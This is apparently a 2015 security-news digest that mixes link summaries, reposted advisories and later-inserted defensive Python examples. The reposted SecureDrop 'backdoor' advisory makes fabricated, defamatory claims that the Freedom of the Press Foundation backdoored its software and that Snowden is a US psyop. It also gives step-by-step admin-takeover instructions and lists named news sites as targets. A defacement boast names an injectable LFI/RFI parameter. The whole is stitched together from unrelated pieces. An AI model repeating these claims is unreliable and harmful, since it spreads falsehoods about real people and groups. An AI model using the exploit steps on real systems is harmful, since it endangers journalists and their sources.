
Scanning Alexa's Top 1M for AXFR

In this blogpost we will discuss a simple information disclosure problem called unauthorized AXFR. This can be used to leak the DNS settings of a particular target, thus revealing DNS entries that were meant to stay internal or private.

We’ve checked Alexa’s Top 1M for this kind of issue and came to some interesting results.

more here.........https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
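The check the post describes, as an added example (not code from the internetwache.org post): it builds the DNS AXFR query in wire format by hand, reads the TCP-framed reply and lists the records an open server returns for a zone. The `axfr()` function talks to a real nameserver; `build_sample_response()` is a constructed reply (no real host was queried) so the parser can be exercised offline. Function names are my own.

```python
"""Check whether a nameserver hands a whole zone (AXFR) to anyone who asks."""
# Added example, not code from the internetwache.org post: the AXFR query is
# built in DNS wire format by hand, the TCP-framed reply is parsed, and
# build_sample_response() is a constructed reply for exercising the parser offline.
import socket
import struct

QTYPE_AXFR = 252
TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX", 16: "TXT", 28: "AAAA"}


def encode_name(name):
    """Dotted hostname -> DNS label sequence (RFC 1035 section 3.1), uncompressed."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError("bad label %r" % label)
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    """TCP-framed AXFR query: 2-byte length, 12-byte header (flags 0), one question."""
    msg = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, 1)
    return struct.pack("!H", len(msg)) + msg


def decode_name(msg, off):
    """Read a name at `off`, following compression pointers; return (name, end offset)."""
    labels, end, jumped = [], off, False
    while True:
        length = msg[off]
        if (length & 0xC0) == 0xC0:  # pointer to an earlier copy of the name
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if ptr >= off:
                raise ValueError("forward compression pointer")  # invalid, and would loop
            end, jumped, off = (end if jumped else off + 2), True, ptr
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", (end if jumped else off)


def parse_records(msg):
    """Return (owner, type, rdata as text) for every RR in the answer section."""
    _, _, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):  # skip the echoed question
        off = decode_name(msg, off)[1] + 4
    records = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            text = ".".join(str(b) for b in msg[off:off + 4])
        elif rtype in (2, 5):
            text = decode_name(msg, off)[0]
        elif rtype == 6:
            mname, p = decode_name(msg, off)
            rname, p = decode_name(msg, p)
            text = "%s %s serial=%d" % (mname, rname, struct.unpack("!I", msg[p:p + 4])[0])
        else:
            text = msg[off:off + rdlen].hex()
        records.append((name, TYPE_NAMES.get(rtype, str(rtype)), text))
        off += rdlen
    return records


def axfr(nameserver, zone, timeout=5.0):
    """Ask `nameserver` for `zone`. A properly restricted server answers with no
    records (REFUSED); an open one returns the zone, SOA first and last."""
    records = []
    with socket.create_connection((nameserver, 53), timeout=timeout) as s:
        s.sendall(build_axfr_query(zone))
        stream = s.makefile("rb")
        while True:
            hdr = stream.read(2)
            if len(hdr) < 2:
                break
            rrs = parse_records(stream.read(struct.unpack("!H", hdr)[0]))
            records.extend(rrs)
            if not rrs or (len(records) > 1 and rrs[-1][1] == "SOA"):
                break
    return records


def build_sample_response(zone="example.com"):
    """Constructed reply from an open server (not captured from any real host)."""
    apex = b"\xc0\x0c"  # compression pointer to the question name at offset 12
    ns1 = encode_name("ns1." + zone)
    soa = ns1 + encode_name("hostmaster." + zone) + struct.pack("!IIIII", 2015032901, 3600, 900, 604800, 300)

    def rr(owner, rtype, rdata):
        return owner + struct.pack("!HHIH", rtype, 1, 300, len(rdata)) + rdata

    answers = rr(apex, 6, soa) + rr(apex, 2, ns1) + rr(encode_name("intranet." + zone), 1, bytes([10, 0, 0, 5])) + rr(apex, 6, soa)
    header = struct.pack("!HHHHHH", 0x1234, 0x8400, 1, 4, 0, 0)
    return header + encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, 1) + answers
```

Run `axfr("ns1.example.com", "example.com")` against each authoritative server of a zone you operate: an empty result is the expected answer, anything else is the leak the post scanned for. The parser enforces backwards-only compression pointers, which is what keeps a hostile reply from looping it.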

Compromised WordPress sites launch drive-by attacks off Pirate Bay clone

WordPress, the leading Content Management System, is one of cyber criminals’ favourite targets when it comes to hacking websites.

Contrary to some beliefs, it’s not because WordPress is a bad or insecurely designed CMS.

As is often the case, the problems come from the users themselves, who aren’t keeping it up to date or like to tear it apart instead of doing proper coding.

While legitimate sites getting hacked is very common, there are times when the patterns and timing are so similar that they indicate an organized effort from the bad guys.

During the past few days, we have been detecting several WordPress sites that were injected with the same iframe. Although we don’t have exact numbers on sites that have been affected, we are assuming that it is a substantial attack.

more here...........https://blog.malwarebytes.org/exploits-2/2015/04/compromised-wordpress-sites-launch-drive-by-attacks-off-pirate-bay-clone/

Recovering deleted records from an SQLite database (updated)

In this slightly lengthy article I want to discuss how we can recover deleted records from an SQLite database, or rather how we can recover all records and distinguish between those that are live in the DB and those that are found in unused areas and do not match a live record. I will also show how the first few bytes of records are regularly overwritten by SQLite structures and how these partial records can be recovered.

more here......http://sandersonforensics.com/forum/content.php?222-Recovering-deleted-records-from-an-SQLite-database
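A small version of what the article does, as an added example (not the article's own code): create a throwaway SQLite database with constructed rows, delete some of them, then compare the strings carved from the raw file against the rows the database still reports as live. Because SQLite (with `secure_delete` off) overwrites at most the first four bytes of a freed cell with the freeblock header, the text of a deleted row normally survives for carving. Function names and the sample notes are mine.

```python
"""Carve deleted rows out of an SQLite file and separate them from live rows."""
# Added example, not code from the Sanderson Forensics article. The database,
# its rows and the temporary directory are constructed for the demonstration.
import os
import re
import shutil
import sqlite3
import tempfile

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{8,}")


def carve_strings(raw):
    """Printable ASCII runs of 8+ bytes anywhere in the file, live or freed."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(raw)]


def live_notes(path):
    conn = sqlite3.connect(path)
    try:
        return [row[0] for row in conn.execute("SELECT note FROM notes ORDER BY id")]
    finally:
        conn.close()


def recover(path):
    """Return (live rows, carved runs that match no live row).

    A carved run may start a byte early (a record-header byte that happens to
    be printable), so live rows are matched by substring, not equality."""
    live = live_notes(path)
    with open(path, "rb") as f:
        raw = f.read()
    orphaned = [s for s in carve_strings(raw) if not any(note in s for note in live)]
    return live, orphaned


def build_and_delete(path, keep, delete):
    """Constructed workload: insert keep + delete, then delete the second group."""
    conn = sqlite3.connect(path)
    # make the setting explicit: with secure_delete ON, SQLite zeroes freed cells
    conn.execute("PRAGMA secure_delete = OFF")
    conn.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, note TEXT)")
    conn.executemany("INSERT INTO notes (note) VALUES (?)", [(n,) for n in keep + delete])
    conn.commit()
    conn.executemany("DELETE FROM notes WHERE note = ?", [(n,) for n in delete])
    conn.commit()
    conn.close()


def demo():
    """Returns (live rows, deleted rows recovered from unused space)."""
    workdir = tempfile.mkdtemp()
    try:
        path = os.path.join(workdir, "evidence.db")
        keep = ["meeting notes: budget review on Monday", "reminder: renew the TLS certificate"]
        delete = ["DRAFT-REMOVED: second quarter forecast", "DRAFT-REMOVED: shortlist of vendors"]
        build_and_delete(path, keep, delete)
        live, orphaned = recover(path)
        found = [n for n in delete if any(n in s for s in orphaned)]
        return live, found
    finally:
        shutil.rmtree(workdir)
```

The `orphaned` list also contains the schema text from `sqlite_master` and any other printable run, which is why the article's approach of parsing cell structure rather than carving strings matters for anything beyond a first triage; the substring matching here is the minimal version of "does this fragment match a live record".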

toolsmith: Rapid Assessment of Web Resources (RAWR!)

Let’s put philosophy into action this month with Adam Byers’ RAWR (NJ Ouchn, our friend @toolswatch, is on the RAWR team too). I asked Adam for the typical tool author’s contribution to the column and was treated to such robust content that I’m going to take a slightly different approach this month, where I’ll weave in Adam’s feedback throughout as we take RAWR on a walkabout.

more here...........http://holisticinfosec.blogspot.com/2015/04/toolsmith-rapid-assessment-of-web.html

OS X & iOS IOKit IOSurfaceRoot (available from sandbox) kernel code execution bug (PoC code included)

SECUREDROP >= 0.3 - Possible Backdoor & Privileges Escalation by Unauth User

[ASCII-art banner]

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
SECURITY VULNERABILITY - SECUREDROP >= 0.3
Possible Backdoor & Privileges Escalation by Unauth User
2015-04-01 by ~~~ Elliptic TAO Team ~~~
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

Hello fellow Internet users,

On this great day, where all the tech companies and fresh startups make
fun of you by presenting you incredible new products and try to fool you
into believing in something that is not there.

We will not.

We tell nothing but the truth, we are, in a way, whistleblowers.

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

~~~Elliptic TAO Team~~~ is the "Nom de plume" of a cyber-warfare
intelligence-gathering unit within the SIGINT forces of a Sovereign State. It
has been active since 2009 to identify, review, monitor, infiltrate, gather
intelligence on computer systems being used by Foreign entities (-:

~~~Elliptic TAO Team~~~ has discovered several critical vulnerabilities
affecting the overly hyped software.
The first vulnerability we are releasing today seems to be a BACKDOOR
PURPOSEDLY (?) INSTALLED BY THE CORE DEV TEAM and present in EVERY INSTALLATION
of the SecureDrop whistleblowing software which allows ARBITRARY ACCESS, DATA
DOWNLOAD, USER CREDENTIALS COMPROMISE, IMPERSONATION OF JOURNALISTS on the platform.

The backdoor was inserted by the Freedom of the Press Foundation to pose a
threat on every company, organization, private party using the platform
and to allow a Foreign Force to persistently and programmatically monitor
communications, download content, impersonate administrators.

SecureDrop is an open-source software platform for secure communication between
journalists and sources (whistleblowers). It was originally designed and
developed by Aaron Swartz and Kevin Poulsen under the name DeadDrop.
After Aaron Swartz's death, the first instance of the platform
was launched under the name Strongbox by staff at The New Yorker on 15 May
2013. The Freedom of the Press Foundation took over development of DeadDrop
under the name SecureDrop, and has since assisted with its installation (and
backdooring) at several news organizations, including ProPublica, The
Intercept, The Guardian, and The Washington Post.

The Freedom of the Press Foundation (FPF) has subsequently willingly modified the
original secure source code to include a software backdoor that allows any user
in possession of the following information to exploit it and gain ADMINISTRATIVE
POWER on every installation deployed right now on the internet.
It is a travesty that the code of the deceased Aaron Swartz has been meddled with
in such a way.

The FPF has so far successfully infiltrated a variety of different media agencies
both in the country of the United States and abroad. They have managed to do so
by exploiting the trustworthiness of PsyOP Agent Snowden (POPAS) to convince
grassroots organisations and media entities alike that they should use SecureDrop.

POPAS has exposed to the world the supposed wrongdoings of the US government agency NSA,
but it is quite likely that this is a Psychological Operation led by the United States
to instill fear and distrust in citizens, leading them to ask for greater security.
This fear and distrust is used to steer the public towards software solutions that often
do little to improve their actual security and, in this particular case, in fact
compromise it.

This is just another clue that leads us to believe that the activities of POPAS and FPF
are in reality guided by handlers inside of the US government.

With this backdoor FPF and their possible co-conspirators can:

* log in, create users, access confidential information
* disable other administrators
* change password of other journalists
* log in as other journalists and see if they received something
* see how many communications journalists are receiving and when
* download their data
* write answers to whistleblowers on behalf of their colleagues
* delete material of journalists

The timing in which the backdoor was included into the software was also interesting.
It was committed to the source code just after a "security review" from a team of
researchers from the University of Washington.
This also coincided with summer vacations, hence probably not many people were looking
at the commits during that time.
If we were to suggest a better time to commit a backdoor to a piece of software we
would not have advised any differently.

If you have still some question about the willingness to backdoor the software,
please take a look at the Software Repository: after backdooring the 0.3
version other versions previously available have been removed from the download
pool to offer only the backdoored one:

<https://apt.pressfreedomfoundation.org/pool/main/s/securedrop/>

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
WEBSITES EXPLOITABLE BY THE BACKDOOR
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

These major sites have been confirmed to be exploitable:

* Forbes https://safesource.forbes.com
* The Guardian https://securedrop.theguardian.com
* The Intercept https://firstlook.org/theintercept/securedrop
* The New Yorker https://projects.newyorker.com/strongbox
* The Washington Post https://ssl.washingtonpost.com/securedrop
* Wired's Kevin Poulsen poulsensqiv6ocq4.onion
* Greenpeace https://www.safesource.org.nz
* ProPublica https://securedrop.propublica.org
* BayLeaks https://bayleaks.com

Many more are potentially vulnerable such as ExposeFacts, NRKbeta, Project On
Gov't Oversight (POGO), Radio24syv, BalkanLeaks and any other installations
running 0.3.

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
AFFECTED VERSIONS
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

Affected versions:
- develop branch since Jul 29, 2014
- all versions present on their debian package repository:
https://apt.pressfreedomfoundation.org/pool/main/s/securedrop/
- securedrop-app-code-0.3-amd64.deb
- securedrop-app-code-0.3.1-amd64.deb

(interesting to note they had also released versions 0.3.2 and 0.3.3, both
vulnerable, but they have been recently removed from the repository)

User privileges needed in order to exploit the vulnerability: unauthenticated user

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
AUTHOR OF THE BACKDOOR AND OFFENDING COMMIT
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

The backdoor was added in the following commit:

<https://github.com/freedomofpress/securedrop/commit/98a99a19d3c7d56a20f6e842d7c6aabd3ca8c75d>

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
VULNERABILITY EVIDENCE
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

File /securedrop/journalist.py, lines 125-128, missing @admin_required
decorator:

125 @app.route('/admin/add', methods=('GET', 'POST'))
126 def admin_add_user():
127     # TODO: process form submission
128     return render_template("admin_add_user.html")
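The defect quoted above is a view under /admin/ with a route decorator but no access-control decorator. The following is an added example, not SecureDrop's code: it reproduces that shape with a minimal stand-in for Flask's route registry (`MiniApp`, `admin_required`, `unguarded_admin_routes` and the view names are all hypothetical) and adds the audit a test suite should run so that a missing guard is reported before release rather than found by an anonymous visitor.

```python
"""Find /admin/ views that are reachable without an admin_required guard."""
# Added example, not SecureDrop's code. MiniApp stands in for flask.Flask;
# the views and session dicts are constructed for the demonstration.
import functools


class MiniApp:
    """Tiny stand-in for flask.Flask: maps a URL rule to its view function."""

    def __init__(self):
        self.routes = {}

    def route(self, rule):
        def register(view):
            self.routes[rule] = view
            return view
        return register


def admin_required(view):
    """Refuse the request unless the session belongs to a logged-in admin."""
    @functools.wraps(view)
    def guarded(session):
        if not (session.get("logged_in") and session.get("is_admin")):
            return 403, "forbidden"
        return view(session)
    guarded.admin_guarded = True  # marker the audit looks for
    return guarded


app = MiniApp()


@app.route("/admin/add")            # the shape the advisory quotes: no guard
def admin_add_user(session):
    return 200, "admin_add_user.html"


@app.route("/admin/delete")         # the same kind of view with the guard applied
@admin_required
def admin_delete_user(session):
    return 200, "admin_delete_user.html"


@app.route("/login")                # public by design, must not be flagged
def login(session):
    return 200, "login.html"


def call(app, rule, session):
    """Dispatch `rule` with a session dict; returns (status, body)."""
    return app.routes[rule](session)


def unguarded_admin_routes(app):
    """Rules under /admin/ whose view does not carry the admin_required marker."""
    return sorted(rule for rule, view in app.routes.items()
                  if rule.startswith("/admin/") and not getattr(view, "admin_guarded", False))
```

Against a real Flask application the same audit iterates `app.url_map.iter_rules()` and looks up each `app.view_functions[rule.endpoint]`; the decorator order matters, since `@app.route` must be outermost for the guarded wrapper to be the registered view.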

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
STEPS TO REPLICATE
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

Steps needed in order to reproduce and exploit the backdoor:

Install the development environment:
(https://www.vagrantup.com/download-archive/v1.6.5.html)

sudo dpkg -i vagrant.deb
sudo dpkg-reconfigure virtualbox-dkms
sudo apt-get install ansible/trusty-backport
sudo apt-get install ansible
git clone git@github.com:freedomofpress/securedrop.git
cd securedrop
vagrant up
vagrant ssh
cd /vagrant/securedrop
python journalist.sh

Exploit the vulnerability to add new admin user:

open firefox at /admin/add
type a new user:
username: th3g4rd1n0fth3guardian
password: 12345
mark i'm using a yubikey
insert the secret: 3132333435363738393031323334353637383930
press: add user

Login with the new admin user
open firefox at /admin/login
type the login info:
username: th3g4rd1n0fth3guardian
password: 12345
token: 755224
press: log in

where 755224 is the first token of the HOTP series associated with the
chosen secret.
just for reference this is the example data by RFC4226
<https://tools.ietf.org/html/rfc4226>
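How the 755224 token follows from that secret, as an added example (not SecureDrop's code): `SECRET` is the RFC 4226 test secret the steps above enter as the YubiKey secret (hex 3132...3930, the ASCII digits 1234567890 twice), `hotp()` is the RFC 4226 computation, and `HotpVerifier` is the server-side check a login form should perform, with the look-ahead window and the moving counter that stop an accepted token from being replayed. The class and function names are mine.

```python
"""HOTP (RFC 4226) generation and a server-side verifier with a look-ahead window."""
# Added example, not SecureDrop's code. SECRET is the RFC 4226 test secret
# quoted in the advisory; the verifier class is a minimal illustration.
import hashlib
import hmac
import struct

SECRET = bytes.fromhex("3132333435363738393031323334353637383930")


def hotp(secret, counter, digits=6):
    """HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % 10 ** digits)


class HotpVerifier:
    """Keeps the next expected counter so an accepted token can never be replayed.

    `window` is how many counters ahead the server searches to resync a token
    that was generated but never submitted (RFC 4226 section 7.2)."""

    def __init__(self, secret, window=5):
        self.secret, self.window, self.counter = secret, window, 0

    def verify(self, token):
        for c in range(self.counter, self.counter + self.window + 1):
            if hmac.compare_digest(hotp(self.secret, c), token):
                self.counter = c + 1   # move past the accepted value
                return True
        return False
```

The comparison uses `hmac.compare_digest` so that a wrong token takes the same time regardless of how many leading digits it shares with the right one; the window is deliberately small, because every extra counter the server is willing to accept is one more valid token for a guesser.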

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
BACKDOOR POWERS
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

Enjoy the admin power!
* log in, create users, access confidential information
* disable other admins
* change password of other journalists
* log in as other journalists and see if they have received something
* see how many communications journalists are receiving and when
* download journalists data
* write answers to whistleblowers on behalf of journalists
* delete material of journalists

Backdoor can be used for:
* eavesdrop on every piece of information submitted to a SecureDrop site
* proactive monitoring and OSINT info gathering
* MITM in communication between journalists and whistleblowers
* erasing evidence and communication (silence whistleblowers)
* gathering content programmatically from every SecureDrop installation

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
REMEDIATIONS
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

The Freedom of the Press Foundation has willingly removed from download the secure
previous versions, so the only remediation can be:

1. Uninstall and block access on EVERY installation.
2. Execute a complete and meticulous log analysis to spot backdoor access.
3. Avoid SecureDrop in any critical installation until further tests.
4. Be VERY SUSPICIOUS OF EVERYTHING COMING FROM FPF.
5. Be paranoid. Very paranoid.


12Fsd2VkX1/hlaz3V9/IyX1ftxssdaoEDqJGxJElZzxsgwV7C6H1HXgtu0ddtaAi+
fdfye6jOwdluXjkgWuuJqsYDyO1ergeKlywi2Oh6Lc=


Vulnerability in site leads to rcrypt packer source code dump

[ASCII-art banner]
We are BFD9000Sec and we have a mini dump surprise for you all! Website compromise leads to SOURCE CODE RELEASE!
Website target: http://www.0xrage.com
Source code: rcrypt packer
LFI/RFI fail in module donate.php?sendcash=[vulnerable]&donationfrom=[doesntmatter]
User input not sanitized at all and now your c0de is d|_|mped! Maybe stop using vulnerable WP plugins? lol
We h0pe u enj0y the rel3ase!
 - BFD9000Sec!!!!

Ceragon FibeAir IP-10 SSH Private Key Exposure (CVE-2015-0936)

# Ceragon FibeAir IP-10 SSH Private Key Exposure (CVE-2015-0936)

## Product Description

Ceragon produces a series of ruggedized, microwave backhaul devices used
to provide connectivity to mobile, IP-based devices; usually, these
devices are found in either large industrial environments, or installed
on towers to provide "middle-mile" connectivity to mobile customers on
behalf of ISPs. In other words, a FibeAir IP-10 typically acts as a router
of IP traffic. A compromise of one of these devices can expose the
communications of all subscribed devices.

## Vulnerability Summary

Several versions of Ceragon FibeAir IP-10 devices have been identified
as having a static, pre-generated public/private keypair associated with
the "mateidu" user available both locally on these devices, and as part
of update packages. This issue is similar to the previously-reported
default root password, reported by Jasper Greve and identified as
[CVE-2015-0924][1]. This vulnerability was [discovered independently][2]
by HD Moore of Rapid7, Inc., while validating CVE-2015-0924.

## Details

There are two important distinctions from CVE-2015-0924. First, the
mateidu user does not, by default, have root-level access permissions on
the device. In order to obtain root access, an attacker would need to
also exercise a local vulnerability.

Second, even if the user was able to easily replace the mateidu
authorized_keys file, later firmware upgrades replace any existing
authorized_keys file with the standard issue key. Distributions of these
update packages containing the corresponding private key are easily
obtained by using simple search terms on any major search engine.

A Metasploit module has been produced and published to demonstrate the
vulnerability, and is made publicly available so device owners and
maintainers may effectively and easily test any mitigation and patching
solution provided or invented.

### Exposed Key Pair

The shipping public key for the mateidu user has the fingerprint,
`27:c6:ad:f9:a6:4d:22:3f:18:b0:3b:df:81:1c:57:45` , and is:

```
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwRIdDlHaIqZXND/l1vFT7ue3rc/DvXh2yx5EFtuxGQRHVxGMazDhV4vj5ANGXDQwUYI0iZh6aOVrDy8I/y9/y+YDGCvsnqrDbuPDjW26s2bBXWgUPiC93T3TA6L2KOxhVcl7mljEOIYACRHPpJNYVGhinCxDUH9LxMrdNXgP5Ok= mateidu@localhost
```

The private key is:

```
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
```

## Vendor Response

According to the vendor, "A software version that fixes the
vulnerability found in the IP-10 product has been released and is
available to our customers for download through our customer support
resource center. Customers who need assistance are encouraged to contact
a Ceragon customer support representative."

## Timeline

 * Jan 16, 2015 (Sat): CVE-2015-0924 disclosed by CERT/CC
 * Jan 21, 2015 (Thu): Rapid7 researcher HD Moore discovers this related
   vulnerability
 * Jan 26, 2015 (Mon): Vendor is notified of the vulnerability
 * Feb 02, 2015 (Tue): Vendor confirms report and indicates a fix is
   prepared
 * Feb 11, 2015 (Thu): CERT/CC is notified, assigns VU#573412 and
   CVE-2015-0936.
 * Mar 26, 2015 (Thu): Vendor confirms a fix has been released
 * Apr 01, 2015 (Wed): [Public disclosure][3] and [Metasploit module][4] are
   published

[1]:https://www.kb.cert.org/vuls/id/936356
[2]:https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying/
[3]:https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15
[4]:https://github.com/rapid7/metasploit-framework/pull/5054

PDF: TROJAN.DROPPER.BISONAL RAT

Bisonal is a malware whose primary purpose is to attack Japanese sites. It functions as a RAT (remote administrative tool) and communicates with its command-and-control (C&C) server without the user noticing it. When required, it can upload information to the server and download new payloads from the server for execution. Data within the binary is fully obfuscated to prevent analysts from easily obtaining it. Bisonal was first discovered in early 2013. Since then, we have analyzed a few of its variants, including binary droppers and office document files (xls and docx). This report aims to unravel the details of the Bisonal trojan’s operation and technical components. The information presented was extracted and analysed using the COSEINC Automated Malware Analysis Lab (CAMAL) sandbox platform.

more here.........https://camal.coseinc.com/publish/2013Bisonal.pdf

RDP Cert Scan with nmap

We recently had a red team where we had a lot of RDP endpoints, but not many other endpoints. We had some time pressure, so we looked to see if nmap had a script (we didn’t see one) and wrote a python script that grabbed the cert names. This is a good way to guess at internal hostnames.

more here.......http://webstersprodigy.net/2015/04/01/rdp-cert-scan-with-nmap/

Android apps in sheep's clothing

.Net injection with Mono.Cecil

This may not be news for everyone but I find it interesting. Mono.Cecil is an impressive piece of work and can provide a lot of cool features such as runtime .NET assembly manipulation. We can inject opcodes (IL instructions) into a target assembly, transforming it as we wish. Here's the test scenario......http://vx.thomazi.me/posts/net-injection-cecil

Intercepting all System Calls by Hooking KiFastSystemCall

Certificate Binary Posters (Part Seven)

Certificate revocation has been done in two primary ways, Certificate Revocation Lists (CRLs) and the Online Certificate Status Protocol (OCSP), at least until some browsers stopped checking for revocation. However, extended validation (EV) certificates still elicit active revocation checking by most browsers.

CRLs are a list of revoked certificate serial numbers from a given certificate authority.

more here.........http://www.cem.me/20150401-cert-binaries-7.html

Instrumenting Android Applications with Frida

As you may have heard, our latest publication, the Mobile Application Hacker’s Handbook, is out. When you’re writing a book you have to agree a number of things with the publisher beforehand, one of which is the page count, and in our case this was initially set at 600 pages. However, what we found when we got close to completion was that we actually had much more content than we had originally anticipated, so some of it still didn’t quite make the cut. One of the areas we wanted to include but didn’t was how to instrument Android apps using Frida – some of this had already been covered in Chapter 4 with regards to iOS apps and would have meant an overlap in content. However, we still think it’s pretty interesting and unique, so we decided to distill some of this into a blog post!

more here........http://blog.mdsec.co.uk/2015/04/instrumenting-android-applications-with.html

Security Audit Notes - OpenSSL v1.0.2a (latest) Issues - Advanced Information Security Corporation

-=[Advanced Information Security Corp]=-


Author: Nicholas Lemonias
Report Date: 2/4/2015
Email: lem.nikolas () gmail com

Introduction
==========
During a source-code audit of the OpenSSL v1.0.2a (Latest) implementation for Linux,
conducted internally by the Advanced Information Security Group, instances of
insecure function use were observed, which could lead to a number of attacks.

Software Overview
===============
OpenSSL is an open-source implementation of the SSL and TLS protocols. The core
library is written in the C language, implements basic cryptographic functions,
and also provides various utility functions. Implementation versions are
available for most UNIX-like operating systems (including Solaris, Linux,
Mac OS X and the various open-source BSD operating systems), OpenVMS and
Microsoft Windows. IBM provides a port for the System i (OS/400). OpenSSL is
based on SSLeay by Eric Andrew Young and Tim Hudson, development of which
unofficially ended on December 17, 1998, when Young and Hudson both started to
work for RSA Security.


PoC 1 - Code Snippet [CWE 362]
========================
(.../openssl-1.0.2a/crypto/rand/randfile.c:264)

    /* excerpt begins inside the #ifdef OPENSSL_SYS_VMS branch of RAND_write_file() */
    out = vms_fopen(file, "rb+", VMS_OPEN_ATTRS);
    if (out == NULL)
        out = vms_fopen(file, "wb", VMS_OPEN_ATTRS);
#else
    if (out == NULL)
        out = fopen(file, "wb");
#endif
    if (out == NULL)
        goto err;

#ifndef NO_CHMOD
    chmod(file, 0600);
    /* excerpt ends here; the matching #endif follows in the source */

Description: The calling function does not provide any security
validation controls, which would effectively prevent a race condition.
The use of open() with the right attributes was agreed.
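What the two orderings look like in practice, as an added example (not OpenSSL code): the first function reproduces the create-then-`chmod` sequence the note flags, recording the permissions the file carries in between; the second creates the file already restricted, through `open(2)` flags with the mode applied at creation, `O_EXCL` so an existing path or symlink is refused rather than followed, and the descriptor used instead of the path afterwards. The seed bytes and the temporary directory are constructed; function names are mine.

```python
"""Create a private file without the fopen()-then-chmod() window."""
# Added example, not OpenSSL code. Reproduces the ordering the audit note
# flags in RAND_write_file and the open(2)-with-mode alternative; the seed
# bytes and the temporary directory are constructed.
import os
import shutil
import stat
import tempfile


def mode_of(path):
    return stat.S_IMODE(os.stat(path).st_mode)


def write_then_chmod(path, data):
    """The flagged shape: the file exists with umask-derived permissions until
    chmod runs, and chmod operates on a path that could be swapped meanwhile.
    Returns (mode observed before chmod, mode after)."""
    with open(path, "wb") as f:
        f.write(data)
        exposed = mode_of(path)
    os.chmod(path, 0o600)
    return exposed, mode_of(path)


def create_private(path, data):
    """Mode 0600 applied at creation; O_EXCL refuses an existing path or
    symlink instead of following it; the descriptor, not the path, is used."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return mode_of(path)


def demo():
    """Run both variants under umask 022; returns (exposed, fixed, strict, reopened)."""
    workdir = tempfile.mkdtemp()
    old_umask = os.umask(0o022)
    try:
        seed = b"constructed seed bytes, not real entropy"
        exposed, fixed = write_then_chmod(os.path.join(workdir, "racy.rnd"), seed)
        strict = create_private(os.path.join(workdir, "safe.rnd"), seed)
        try:
            create_private(os.path.join(workdir, "safe.rnd"), seed)
            reopened = True
        except FileExistsError:
            reopened = False   # O_EXCL: a pre-planted file or link is not reused
        return exposed, fixed, strict, reopened
    finally:
        os.umask(old_umask)
        shutil.rmtree(workdir)
```

Under the usual umask of 022 the first variant leaves the seed world-readable (0644) for the interval between the two calls; the second never has a more permissive file on disk at any point, which is the property the note's "open() with the right attributes" refers to.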


